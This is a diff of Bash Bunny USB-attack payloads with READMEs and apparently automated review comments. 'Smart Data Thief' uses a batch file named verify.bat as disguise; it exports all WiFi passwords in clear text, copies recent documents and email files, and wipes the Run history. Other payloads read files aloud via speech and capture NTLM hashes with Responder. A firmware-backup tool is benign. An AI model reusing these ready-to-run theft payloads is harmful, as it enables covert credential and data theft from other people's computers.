RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
Q DELAY 5000
LED STAGE2
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
Q ENTER
Q DELAY 3500
Q STRING "CD \"\${BB_VOLUME}\""
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING ".\payload.ps1 -SSID \"${SANDISK_SSID}\" -PSK \"${SANDISK_PSK}\" -LOOT \"${SANDISK_LOOT}\" -DIRECTORY \"${USER_DIRECTORY}\" -EXTENSION \"${FILE_EXTENSION}\""
Q ENTER
Q DELAY 1500
######## FINISH ########
LED FINISH
shutdown -h 0


@ -0,0 +1,109 @@
# Title: Smart Data Thief
# Description: Exfiltrates high value files from documents / desktop, gets all WiFi keys, shuts down after configurable
# time, may be triggered to start and / or stop by BLE, offers optional distraction on shutdown
# Author: saintcrossbow
# Props: Hak5Darren
# Version: 1.0
# Category: Exfiltration
# Target: Windows 10 with minimum powershell usage
# Attackmodes: HID, Storage
# Full Description
# ----------------
# The perfect versatile data thief with multiple configurations to tailor attacks towards an engagement. Attack is timed
# so you'll know exactly how much time you have with each target. See the configuraton section for modifications.
#
# Payload targets the following from the workstation:
# - All WiFi creds
# - The past 30 days in both Desktop and Documents
# - All Word docs, Excel spreadsheets, loose email files (*.msg), text files, and OneNote notebooks
#
# * Note: All bluetooth monitoring based on Hak5Darren's methods already present on the Bash Bunny
# Files
# -----
# - payload.txt: Starts and monitors the attack. All configuration contained in this file.
# - verify.bat: Run the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't
# verify anything it is just called that because it is "in disguise"
# Setup
# -----
# - Place the payload.txt and verify.bat on either switch directory
# - If you are using a SD card, copy verify.bat under /payloads/switchn/ (where n is the switch you are running)
# - Good idea to have the Bash Bunny ready to copy to either the device or SD for maximum versatility
# LEDs
# ----
# Magenta: Initial setup about 1 3 seconds
# Slow 1 second yellow on and off: Waiting for start mission trigger by BLE
# Single yellow blink: Attack in progress
# Green rapid flash, then solid, then off: Attack complete Bash Bunny may be removed
# Options
# -------
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
BB_NAME="BashBunny"
# Total time allocated for the attack, after which the Bash Bunny will shutdown
EJECT_TIME=30
# BLE ID to stop attack immediately and go to shutdown
ABORT_MISSION="QSTOP"
# Flash a bunch of windows and lock PC if ABORT mission received
DISTRACT_ON_ABORT=false
# Do we wait for a start trigger? And what is it?
WAIT_FOR_TRIGGER=false
START_MISSION="QSTART"
# Setup
# -----
LED SETUP
# Start bluetooth for observation
source bunny_helpers.sh
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
echo -n -e "AT+ROLE=2" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
# Wait for "button job" if desired
if $WAIT_FOR_TRIGGER; then
CUCUMBER ENABLE
LED Y SLOW
WAIT_FOR_PRESENT $START_MISSION
fi
# Attack
# ------
CUCUMBER DISABLE
ATTACKMODE HID STORAGE
Q DELAY 1000
LED ATTACK
Q DELAY 100
Q GUI r
Q DELAY 100
Q STRING cmd.exe /c start /min powershell ".((gwmi win32_volume -f 'label=''$BB_NAME''').Name+'payloads\\$SWITCH_POSITION\verify.bat')"
Q ENTER
# Variation on the WAIT_FOR_PRESENT method so we can delay as well as observe BLE
for (( c=1; c<=$EJECT_TIME; c++ ))
do
timeout 1s cat /dev/ttyS1 > /tmp/bt_observation
if grep -ao $ABORT_MISSION /tmp/bt_observation; then
if $DISTRACT_ON_ABORT; then
for i in {1..5}
do
Q GUI d
Q DELAY 200
done
Q GUI l
fi
break
fi
done
sync
LED FINISH
Q DELAY 1500
shutdown now
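Review bot: The `stty -F /dev/ttyS1 speed 115200 ...` line is issued twice in a row with identical arguments; if the repetition is deliberate, a one-line comment should say why, otherwise one copy should go. `EJECT_TIME=30` is documented as the total time allocated, but the `for` loop counts iterations of `timeout 1s cat` plus the `grep` and LED work, so the wall-clock time is only approximately that many seconds; `# Approximate time in seconds allocated for the attack` would be accurate. The LED comment `# Magenta: Initial setup about 1 3 seconds` appears to have lost a dash and should read `# Magenta: Initial setup, about 1-3 seconds`. `WAIT_FOR_PRESENT` and `CUCUMBER` come from `bunny_helpers.sh`, which is outside this file.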


@ -0,0 +1,54 @@
## Smart Data Thief
Make your Bash Bunny into the perfect data thief. This payload is ideal for demonstrating the need to lock workstations: using it, you can stroll through a facility and steal critical information from PC after PC. The attack is highly configurable with the following options:
- Copies are timed to be as fast or as long as you want. Youll know
exactly how long you have per workstation, and also know you can
remove the Bash Bunny safely once it the time expires
- The copy may be configured to stop when a secret BLE beacon is sent
the Bash Bunny will shut down for immediate removal.
- Concerned that someone might see the attack? Configure the payload to
flash windows and suddenly lock before shutting down the Bash Bunny,
which gives the payload time to clean up its tracks while you make
appropriate excuses.
- Want to trigger the payload from afar? Make the attack a “button job”
the Bash Bunny will take advantage of Cool Cucumber CPU usage while
waiting for the secret BLE beacon.
The payload may be used with or without a SD card and places loot in a folder with the computers name. Additionally it targets the most likely high-value targets on a workstation, and only those that have been updated in past 30 days however feel free to tailor parameters to your unique pentest situation.
**Targets**
1. All WiFi creds used by the workstation
2. The past 30 days in both Desktop and Documents for:
- Word docs
- Excel spreadsheets
- Loose email files (*.msg)
- Text files
- OneNote notebooks
**Files Used**
- payload.txt: Starts and monitors the attack. All configuration constants are contained in this file.
- verify.bat: Runs the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't verify anything it is just called that because it is "in disguise"
**Setup**
1. Place the payload.txt and verify.bat on either switch directory
2. If you are using a SD card, copy verify.bat to /payloads/switch*n*/ (where *n* is the switch you are running)
3. For maximum versatility, place verify.bat in both locations
**Payload Configuration**
Change any of the constants below to match your mission parameters:
- BB_NAME: Make sure you have the right Bash Bunny name in this constant
- EJECT_TIME: Total time allocated for the attack, after which the Bash Bunny will shutdown
- ABORT_MISSION: Specify what BLE beacon will stop the attack - the payload will check every second for the beacon
- DISTRACT_ON_ABORT: If the payload is stopped by the BLE beacon, it will also flash a bunch of windows and lock the PC before shutting down to cause a distraction.
- WAIT_FOR_TRIGGER: Dont start the attack immediately but wait for the BLE beacon.
- START_MISSION: The BLE beacon that will remotely start the attack. Make sure WAIT_FOR_TRIGGER is set to true.
**LED meanings**
- Magenta: Initial setup about 1 3 seconds
- Slow 1 second yellow on and off: Waiting for start mission trigger to be sent by BLE
- Single yellow blink: Attack in progress
- Green rapid flash, then solid, then off: Attack complete Bash Bunny may be removed


@ -0,0 +1,14 @@
@echo off
cd /d %~dp0
mkdir \loot\WiFiCreds\%COMPUTERNAME%
cd \loot\WiFiCreds\%COMPUTERNAME%
netsh wlan export profile key=clear
timeout 1
mkdir \loot\DriveLast30\%COMPUTERNAME%
cd \loot\DriveLast30\%COMPUTERNAME%
robocopy %userprofile%\Documents\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl
robocopy %userprofile%\Desktop\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
timeout 1
exit


@ -0,0 +1,22 @@
# Title: Read It Out
# Description: Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
# Author: Cribbit
# Version: 1.0
# Category: Exfiltration
# Target: Windows (Powershell 5.1+)
# Attackmodes: HID
# Extensions: Run
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID
QUACK DELAY 500
LED ATTACK
RUN WIN "powershell -Noni -NoP -W h -C \"& {\$s=New-Object -ComObject SAPI.SPVoice; gci([Environment]::GetFolderPath('MyDocuments')) -file *.txt | % {\$s.Speak(\$(gc(\$_.FullName)))}}\""
LED FINISH
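Review bot: `GET SWITCH_POSITION` on the line after `LED SETUP` is never used — the payload only sets `ATTACKMODE HID` and runs a `RUN WIN` one-liner that does not reference `$SWITCH_POSITION` — so that line can be dropped. If it is kept for consistency with the other payloads in this commit, a short comment such as `# SWITCH_POSITION not needed: nothing is read from the payload directory` would stop the next reader from looking for a missing storage dependency.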


@ -0,0 +1,27 @@
# Read It Out
- Author: Cribbit
- Version: 1.0
- Target: Windows 10 (Powershell 5.1+)
- Category: Exfiltration
- Attackmode: HID
- Extensions: Run
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Super subtle exfiltration method.
Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
## Config
Add -r to do subdirectorys
## Colours
| Status | Colour | Description |
| ------ | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISH | Green blink followed by SOLID | Script is finished |


@ -0,0 +1,23 @@
# BlueTooth2
BlueTooth2 is a program that scans for two bluetooth devices and depending on what one it finds it runs whatever.
## What it Does and How its Different
Unlike the standard WAIT_FOR_PRESENT that scans for one device and doesnt allow code after it to run until found.
This will do a scan and then check for two different devices names allowing for multiple remote triggers that
can do different things.
## Note
I imagine your looking at this code and wondering what idiot wrote it and I would very cool if you would
make it more efficient or even pretty. It worked when I tested it (I use BLE Tool)
## LED
| COLOR | DESCRIPTION |
|---------|-------------|
| White | Scan |
| Yellow | Checking |
| Green | Attack1 |
| Blue | Attack2 |


@ -0,0 +1,76 @@
#!/bin/bash
#
# Title: BlueTooth2
# Description: multiple remote triggers
# Author: JustaProgrammer9
# Category: General
# Target: Windows
# Attackmodes: HID
# Suggestion: Use BLE Tool if triggers take to long
#
#--// Function \\--#
WAIT_FOR_BLUETOOTH() {
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
echo -n -e "AT+ROLE=2" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
}
#------------------#
#--// Setup/Config \\--#
ATTACKMODE HID
device="notepad"
otherdevice="attack"
#----------------------#
#--// Check for devices \\--#
while true; do
LED W
WAIT_FOR_BLUETOOTH
LED Y
if grep -qao $device /tmp/bt_observation; then
if1="true"
break
sleep 1
elif grep -qao $otherdevice /tmp/bt_observation; then
if2="true"
break
sleep 1
#add more if's for more bluetooth devices to look for
fi
done
#---------------------------#
#--// Your attacks \\--#
if [ $if1 = "true" ]; then
LED G
Q GUI r
Q DELAY 100
Q STRING "notepad"
Q ENTER
Q DELAY 200
Q STRING "Hak5 rules"
Q ENTER
elif [ $if2 = "true" ]; then
LED B
# do something cool here
else
LED R
fi
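Review bot: `if1` and `if2` are never initialized and are expanded unquoted in `if [ $if1 = "true" ]` / `elif [ $if2 = "true" ]`, so when only `$otherdevice` was seen the first test becomes `[ = "true" ]`, `test` prints a syntax error, and the script only reaches the `elif` branch by accident. Set `if1="false"` and `if2="false"` in the Setup/Config section and quote the tests, `if [ "$if1" = "true" ]; then` and `elif [ "$if2" = "true" ]; then`. The two `sleep 1` lines placed after `break` are unreachable and can be removed. `grep -qao $device` also matches the name as a substring of any longer advertisement text, so a tighter pattern (or `grep -qaw`) would reduce accidental triggers.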


@ -0,0 +1,92 @@
#!/bin/python2
from __future__ import absolute_import
import sys
import datetime
import base64
import binascii
import struct
import time
from io import open
try:
try:
LogFile = open(u"./UIBEX_ExtractionLog.txt", u"x")
except FileExistsError:
LogFile = open(u"./UIBEX_ExtractionLog.txt", u"a")
except NameError:
try:
LogFile = open(u"./UIBEX_ExtractionLog.txt", u"a")
except OSError:
LogFile = open(u"./UIBEX_ExtractionLog.txt", u"w")
if len(sys.argv) != 2:
sys.stdout.write(u"Usage: {a} <Ubootimage/Block device containing image>\n".format(a=sys.argv[0]))
sys.exit(1)
LogFile.write(u"[{a}]: Opening file {b} for reading...\n".format(a=datetime.datetime.utcnow(),b=sys.argv[1]))
try:
InFileHan = open(sys.argv[1],u"rb")
except OSError as E:
LogFile.write(u"[{a}]: Error. {E}\n".format(a=datetime.datetime.utcnow(),E=str(E)))
sys.exit(1)
LogFile.write(u"[{a}]: File open. Loading header....\n".format(a=datetime.datetime.utcnow()))
InHeader = InFileHan.read(64)
LogFile.write(u"[{a}]: Header loaded. Checking Magic.\n".format(a=datetime.datetime.utcnow()))
try:
assert InHeader[0:4:] == "'\x05\x19V"
except AssertionError:
LogFile.write(u"[{a}]: Assertion failed, magic is not correct.\n".format(a=datetime.datetime.utcnow()))
sys.exit(1)
LogFile.write(u"[{a}]: Magic verified.\n".format(a=datetime.datetime.utcnow()))
InHedC = InHeader + "1"
InHedC = InHedC[0:64:]
# Blanking CRC.
InHedC = InHedC[0:4:] + "\x00\x00\x00\x00" + InHedC[8::]
# Verify CRC.
HeaderCRC = struct.pack(">i",binascii.crc32(InHedC))
try:
assert HeaderCRC == InHeader[4:8:]
except AssertionError:
LogFile.write(u"[{a}]: Assertion failed, CRC fail to verify. Calculated CRC: {b} Stored CRC: {c}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(HeaderCRC),c=base64.b16encode(InHeader[4:8:])))
sys.exit(1)
LogFile.write(u"[{a}]: Header CRC: {b}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(HeaderCRC)))
LogFile.write(u"[{a}]: Searching for uImage data.\n".format(a=datetime.datetime.utcnow()))
# Grab length and verify data.
ImageLength = struct.unpack(">i",InHeader[12:16])[0]
ImageData = InFileHan.read(ImageLength)
LogFile.write(u"[{a}]: uImage data loaded.\n".format(a=datetime.datetime.utcnow()))
# Verify CRC.
DataCRC = struct.pack(">i",binascii.crc32(ImageData))
try:
assert DataCRC == InHeader[24:28:]
except AssertionError:
LogFile.write(u"[{a}]: Assertion failed, CRC fail to verify. Calculated CRC: {b} Stored CRC: {c}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(DataCRC),c=base64.b16encode(InHeader[24:28:])))
sys.exit(1)
LogFile.write(u"[{a}]: Data CRC: {b}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(DataCRC)))
LogFile.write(u"[{a}]: Both CRC's have been verified. Extraction complete.\n".format(a=datetime.datetime.utcnow()))
LogFile.write(u"[{a}]: Here is header information:\n".format(a=datetime.datetime.utcnow()))
HeaderDataT = [
(u"Image Header Magic Number",base64.b16encode(InHeader[0:4]).decode()),
(u"Image Header CRC Checksum",base64.b16encode(InHeader[4:8]).decode()),
(u"Image Creation Timestamp",base64.b16encode(InHeader[8:12]).decode()),
(u"Image Data Size",base64.b16encode(InHeader[12:16]).decode()),
(u"Data Load Address",base64.b16encode(InHeader[16:20]).decode()),
(u"Entry Point Address",base64.b16encode(InHeader[20:24]).decode()),
(u"Image Data CRC Checksum",base64.b16encode(InHeader[24:28]).decode()),
(u"Operating System",ord(InHeader[28])),
(u"CPU architecture",ord(InHeader[29])),
(u"Image Type",ord(InHeader[30])),
(u"Compression Type",ord(InHeader[31])),
(u"Image Name",InHeader[32::].split("\x00")[0].decode())
]
for x in HeaderDataT:
LogFile.write(u"{x0}: {x1}\n".format(x0=x[0],x1=x[1]))
OutFileName = "./uImage-{a}.img".format(a=int(time.time()//1))
LogFile.write(u"[{a}]: Writing image to {OutFileName}\n".format(a=datetime.datetime.utcnow(),OutFileName=OutFileName))
OutFileHan = open(OutFileName,u"wb")
OutBytes = OutFileHan.write(InHeader + ImageData)
LogFile.write(u"[{a}]: Written {OutBytes} bytes.\n".format(a=datetime.datetime.utcnow(),OutBytes=OutBytes))
LogFile.write(u"[{a}]: -------------------------------------------------------\n".format(a=datetime.datetime.utcnow()))
LogFile.close()
sys.exit(0)
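Review bot: The magic check and both CRC checks are written as `assert` inside `try/except AssertionError`, so running the script under `python2 -O` strips them and a header or image with a wrong magic or CRC is accepted and written out as "verified"; replace each with a plain test such as `if InHeader[0:4:] != "'\x05\x19V":` followed by the existing log line and `sys.exit(1)`, and likewise for `HeaderCRC != InHeader[4:8:]` and `DataCRC != InHeader[24:28:]`. `InHeader = InFileHan.read(64)` is never length-checked, so a short input produces a truncated header that fails the magic or CRC test with a misleading message instead of a clear short-read error; add `if len(InHeader) != 64:` before the magic test. `ImageLength = struct.unpack(">i", ...)` decodes the size field as signed, so a size with the top bit set becomes negative and `InFileHan.read(ImageLength)` reads to end of file; `">I"` is the unsigned format that matches the field. Neither `InFileHan` nor `OutFileHan` is closed before `sys.exit`, so `with open(...)` blocks (or explicit `close()` calls) would make the output flush explicit.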


@ -0,0 +1,156 @@
#!/bin/bash
#
# Title: FICBunny
# Description: Firmware Image Creator for the Bash Bunny
# Author: HSF3232
# Version: 1.0
# Last tested Bunny Firmware version: 1.7
#
# LED STATUS
# Slow blinking Red - Failed to get the script. Please check that "UIBEX.py" exists within the payload directory.
# Solid Magenta - Setup in progress...
# Single blinking Yellow - STAGE 1
# Double blinking Yellow - STAGE 2
# Triple blinking Yellow - STAGE 3
# Quadruple blinking Yellow - STAGE 4
# Solid Red (After STAGE 4) - Firmware image is missing. If WriteToRecovery is on, will copy the missing firmware image to recovery.
# Quadruple blinking Cyan (After STAGE 4) - Firmware image exists. If Overwrite and WriteToRecovery are on, will replace the firmware image.
# Very fast Blinking Magenta - I am writing to the recovery partition, DO NOT UNPLUG!
########
# VARS #
########
# WriteToRecovery - When firmware image extraction is complete, write the firmware image to recovery?
WriteToRecovery=1
# Overwrite - If an existing firmware file is detected within recovery, overwrite it?
Overwrite=0
#################################
# DO NOT TOUCH BELOW THIS LINE! #
#################################
GET SWITCH_POSITION
###############
# SETUP Stage.#
###############
# Setup stage will force turn off ATTACKMODE to allow access to storage, then we will copy the required script and make the necessary directories.
ATTACKMODE OFF # Enforce no access to storage. Once execution is complete, we will turn ATTACKMODE to SERIAL STORAGE.
LED SETUP
mount /dev/nandf /root/udisk # Ensure udisk is avalible to copy our UIBEX script.
switchPOS=$SWITCH_POSITION
if [ ! -e /root/udisk/payloads/$switchPOS/UIBEX.py ]; then # Needed uImage extraction script wasn't found...
LED FAIL
exit 1
fi
mkdir /tmp/rootexfs # Temporary directory for holding blank system folders and the UIBEX.py script.
mkdir /tmp/massdisk # /dev/nandf OR /dev/mmcblk0p1. We will copy our completed firmware image here for later keeping.
# Since we're executing this script from /tmp, we can unmount udisk once we're ready.
mkdir /tmp/recdisk # /dev/nandg. We will be copying our completed firmware image here once done to re-enable recovery.
mkdir /tmp/cachedisk # /dev/nandh. We will need this to store our large temporary files.
cp /root/udisk/payloads/$switchPOS/UIBEX.py /tmp/rootexfs # Copy the required script.
sleep 1 # Safety net, copying the file over.
umount /root/udisk # We're finished here.
cd /tmp/rootexfs # Using CD to change our working directory to rootexfs so we can execute UIBEX.py.
mkdir media mnt proc sys tmp # Make blank directories - We will use this later for creating rootfs.tar
chmod 555 proc sys # dr-xr-xr-x
chmod 777 tmp # drwxrwxrwx
# Mounting required partitions.
if [ -b /dev/mmcblk0p1 ]; then # If we have the SD card available to us, mount it.
mount /dev/mmcblk0p1 /tmp/massdisk
else
mount /dev/nandf /tmp/massdisk
fi
mount /dev/nandg /tmp/recdisk # Make recovery disk mount point.
mount /dev/nandh /tmp/cachedisk # Make cache disk mount point.
mkdir /tmp/cachedisk/upgrade # Make upgrade directory - we will place rootfs and uImage in here.
mkdir -p /tmp/massdisk/loot/recscript # Make storage location for output of all script related content.
###########
# STAGE 1 #
###########
# Extract the uImage file.
LED STAGE1
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
python2 UIBEX.py /dev/nandc # Execute uImage extraction script.
mv uImage*.img /tmp/cachedisk/upgrade/uImage # move uImage to the upgrade folder
md5sum /tmp/cachedisk/upgrade/uImage > /tmp/cachedisk/upgrade/uImage.md5 # Calculate MD5, save to upgrade folder.
mv UIBEX_ExtractionLog.txt /tmp/massdisk/loot/recscript/ # Move the extraction log to output folder.
# UIBEX complete.
###########
# STAGE 2 #
###########
# Copy all system directories into rootfs.tar
LED STAGE2
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for the user interface.
tar --transform 's,^,/rootfs/,S' -cvf /tmp/cachedisk/upgrade/cherry.rootfs.tar media/ mnt/ proc/ sys/ tmp/ /boot/ /home/ /opt/ /srv/ /dev/pts /dev/shm/ /dev/fd/ /dev/ptmx /dev/stderr /dev/stdin /dev/stdout /dev/full /dev/null /dev/random /dev/urandom /dev/zero /dev/tty /root/ /run/ /etc/ /sbin/ /bin/ /lib/ /var/ /usr/ &> /tmp/massdisk/loot/recscript/RootFS_EX_errors.txt > /tmp/massdisk/loot/recscript/RootFS_EX_output.txt
# Tar all filesystem resources to rootfs.tar in upgrade folder
md5sum /tmp/cachedisk/upgrade/cherry.rootfs.tar > /tmp/cachedisk/upgrade/cherry.rootfs.tar.md5 # Calculate MD5, save to upgrade folder.
# TAR image extraction is complete.
###########
# STAGE 3 #
###########
# Compile firmware file.
LED STAGE3
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
# Now complie the tar.gz to /tmp/massdisk/
cd /tmp/cachedisk/ # Need to move to cache disk, otherwise files would be located at /tmp/cachedisk/upgrade, not what we want!
tar -czvf "/tmp/massdisk/loot/recscript/ch_fw_`cat /root/version.txt`.tar.gz" upgrade &> /tmp/massdisk/loot/recscript/Firmware_Com_errors.txt > /tmp/massdisk/loot/recscript/Firmware_Com_output.txt
cd /tmp/rootexfs # Move back to orignal directory.
# Image compliation completed.
###########
# STAGE 4 #
###########
# Check if firmware file exists in recdisk. If not, copy generated firmware file to recdisk.
LED STAGE4
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
# Let's check if an image already exists in the recdisk.
startString="ch_fw_"
entry=`ls /tmp/recdisk/root/ | while read line; do echo ${line} | grep "^$startString.*.tar.gz$";done | head -n 1`
NeedToWriteFirmWareImage=0
if [ "$entry" = "" ]; then
LED R SOLID # Indicate that a firmware image was missing.
sleep 1
NeedToWriteFirmWareImage=1
else
LED C QUAD # An existing firmware image was found.
sleep 1
if [ $Overwrite -eq 1 ]; then
NeedToWriteFirmWareImage=1
fi
fi
if [ $NeedToWriteFirmWareImage -eq 1 ] && [ $WriteToRecovery -eq 1 ]; then
LED M VERYFAST # Copying firmware image from massdisk to recovery disk.
cp /tmp/massdisk/loot/recscript/ch_fw*.tar.gz /tmp/recdisk/root/
sync # Just in case.
fi
###########
# CLEANUP #
###########
LED CLEANUP
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
# Removing a bunch of directories.
rm -R /tmp/cachedisk/*
sync
umount /tmp/cachedisk
umount /tmp/massdisk
umount /tmp/recdisk
rmdir /tmp/cachedisk
rmdir /tmp/massdisk
rmdir /tmp/recdisk
rm -R /tmp/rootexfs
##########
# FINISH #
##########
LED FINISH
sleep 1
# End of the script will swap to LED BLUE SLOW and activate our storage.
LED B SLOW
ATTACKMODE SERIAL STORAGE
exit 0
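Review bot: The exit status of `python2 UIBEX.py /dev/nandc` in STAGE 1 is never checked, so if extraction fails (UIBEX exits 1 on a bad magic or CRC) the following `mv uImage*.img` also fails, STAGE 3 packs an archive without a uImage, and STAGE 4 may still copy that incomplete `ch_fw_*.tar.gz` into the recovery partition when no image is present there; guard it with `python2 UIBEX.py /dev/nandc || { LED FAIL; exit 1; }` (the partitions mounted in setup would still need unmounting on that path). In CLEANUP, `rm -R /tmp/cachedisk/*` empties the whole mounted `/dev/nandh` partition rather than only the `upgrade` directory this script created; `rm -R /tmp/cachedisk/upgrade` limits the deletion to the script's own files. The `mkdir` calls in the setup stage lack `-p`, so a rerun in the same session after an aborted pass would fail on the existing `/tmp/*` directories.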


@ -0,0 +1,38 @@
## FICBunny
* Title: FICBunny
* Short Description: Firmware Image Creator for the Bash Bunny
* Author: HSF3232 (@Hacksawfred3232)
* Contributer: Austin Spraggins (@spragginsdesigns)
* Version: 1.0
* Last tested Bunny Firmware version: 1.7
## Long Description
The primary purpose of this script is to create a backup image (in case you want to revert to a known good point). Then replace the missing firmware image within /dev/nandg, should it be missing.
Note: It may be a good idea to disable non-critical services - if any - on the bunny before starting this payload.
**WARNING: /dev/nandg CONTAINS RECOVERY RELATED FILES! WHILE I HAVE TESTED THIS SCRIPT MANY TIMES TO ENSURE IT DOESN'T DO ANYTHING SCREWEY, YOU NORMALLY SHOULD NOT TOUCH /dev/nandg! IF YOU DON'T WANT TO MESS WITH THE RECOVERY PARTITION, TURN OFF "WriteToRecovery"!!**
## Variables
| Name | Description | Default |
| --------------- | --------------------------------------------------------------------------------- | ------- |
| WriteToRecovery | When firmware image extraction is complete, write the firmware image to recovery? | 1 |
| Overwrite | If an existing firmware file is detected within recovery, overwrite it? | 0 |
## STATUS
| LED | Status |
| ----------------------- | ------------------------------------------------------------------------------------------------------------- |
| SETUP | Copying required script file to /tmp, creating needed directories, and mounting partitions |
| FAIL | Couldn't find the file of script needed within payload directory |
| STAGE 1 | Extracting uImage file |
| STAGE 2 | Copying rootFS into rootfs.tar |
| STAGE 3 | Compile the firmware file from rootfs.tar and uImage into a file on MassDisk |
| STAGE 4 | Looking in Recovery partition for backup firmware image |
| R SOLID | Backup firmware image missing! If told to, will copy generated backup firmware image into recovery. |
| C QUAD | Backup firmware image found! If told to, script will overwrite it. |
| M VERYFAST | Writing to recovery partition, **DO NOT UNPLUG!!!!** |
| CLEANUP | Removing temporary directories and unmounting partitions |
| FINISH | Script is finished, starting arming mode (ATTACKMODE SERIAL STORAGE) |


@ -0,0 +1,261 @@
# Title: Revolver
# Description: Multiple network attacks and modes based on BLE beacons
# Author: saintcrossbow
# Props: Hak5Darren (BLE, QuickCreds, nmap)
# Version: 1.0
# Category: General
# Target: Windows 10 with minimum powershell usage
# Attackmodes: All
# Full Description
# ----------------
# This payload was made in the style of Q Branch: those that use this need to know they have
# multiple options for attack as well as getting out of a bad situation. Switching into this
# payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start
# attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The
# payload is easily extendable to include any attack you might need in the field.
#
# Note other payloads were co-opted into this multimode attack, and to make it easy I used
# Hak5Darren's code, partially because I imagine he wants to see these payloads extended,
# and also because I know he appreciates Q Branch.
# Configuring
# -----------
# Change the BLE beacon commands listed in Options below to something unique to you. Definitely
# do not want someone else activating your Bash Bunny. Also verify the responder and nmap
# options are to your liking.
# Usage
# -----
# Plug in to get into command waiting mode (slow white LED). Launch attacks by sending the
# right BLE beacon. Make sure to stop the beacon after the attack so you won't go into a loop.
# LEDs
# ----
# Slow white LED: Awaiting BLE commands
# Yellow: Attack in progress
# Red: Self destruct of loot
# Blue solid: USB mode
# Cyan solid: Ethernet mode
# Options
# -------
REQUIRETOOL responder
# BLE beacon options - change to your preferences. Make sure to use things
# you'll not encounter since you don't want to start a self-destruct sequence
# on accident
ABORT_MISSION="QSTOP"
START_QUICKCREDS_WIN="QCREDS"
START_QUICKCREDS_NIX="QCREDNIX"
START_NMAP="QNMAP"
START_USB="QLOOT"
START_ETHER="QETHER"
START_DEL_LOOT="QSELFD"
# Responder options
RESPONDER_OPTIONS="-w -r -d P"
RESPONDER_LOOTDIR=/root/udisk/loot/quickcreds
# Nmap options
NMAP_OPTIONS = "-sS -O -sV -F -oA"
NMAP_LOOTDIR=/root/udisk/loot/nmap
# Setup
# -----
LED SETUP
# Responder
# ---------
# Note: This is a modified version of quick creds
# Original by Hak5Darren
# ---------
startResponder()
{
CUCUMBER DISABLE
# Set convenience variables
GET TARGET_HOSTNAME
GET TARGET_IP
# Setup named logs in loot directory
mkdir -p $RESPONDER_LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $RESPONDER_LOOTDIR/$HOST* | wc -l)
COUNT=$((COUNT+1))
mkdir -p $RESPONDER_LOOTDIR/$HOST-$COUNT
# As a backup also copy logs to a loot directory in /root/loot/
mkdir -p /root/loot/quickcreds/$HOST-$COUNT
# Check target IP address. If unset, blink RED and end.
if [ -z "${TARGET_IP}" ]; then
LED FAIL2
exit 1
fi
# Set LED yellow, run attack
LED ATTACK
cd /tools/responder
# Clean logs directory
rm logs/*
# Run Responder with specified options
python Responder.py -I usb0 $RESPONDER_OPTIONS &
# Wait until NTLM log is found
until [ -f logs/*NTLM* ]
do
# Ima just loop here until NTLM logs are found
sleep 1
done
# copy logs to loot directory
cp logs/* /root/loot/quickcreds/$HOST-$COUNT
cp logs/* $RESPONDER_LOOTDIR/$HOST-$COUNT
# Sync USB disk filesystem
sync
LED FINISH
Q DELAY 1500
# Return to waiting mode
CUCUMBER ENABLE
LED W SLOW
}
# Nmap
# ----
# Note: This is a modified version of one of the very first payloads, nmap
# Original by Hak5Darren
# ----
startNmap()
{
CUCUMBER DISABLE
ATTACKMODE RNDIS_ETHERNET
GET TARGET_HOSTNAME
GET TARGET_IP
# Setup named logs in loot directory
mkdir -p $NMAP_LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $NMAP_LOOTDIR/$HOST*.log | wc -l)
COUNT=$((COUNT+1))
if [ -z ""${TARGET_IP} ]; then
LED FAIL
Q DELAY 1500
else
LED ATTACK
nmap $NMAP_OPTIONS $TARGET_IP >> $NMAP_LOOTDIR/$HOST-$COUNT.log
sync
LED FINISH
Q DELAY 1500
fi
# Return to waiting mode
CUCUMBER ENABLE
LED W SLOW
}
startLoot()
{
CUCUMBER DISABLE
# We are going for solid LED this time in case the device needs to be played off as normal USB
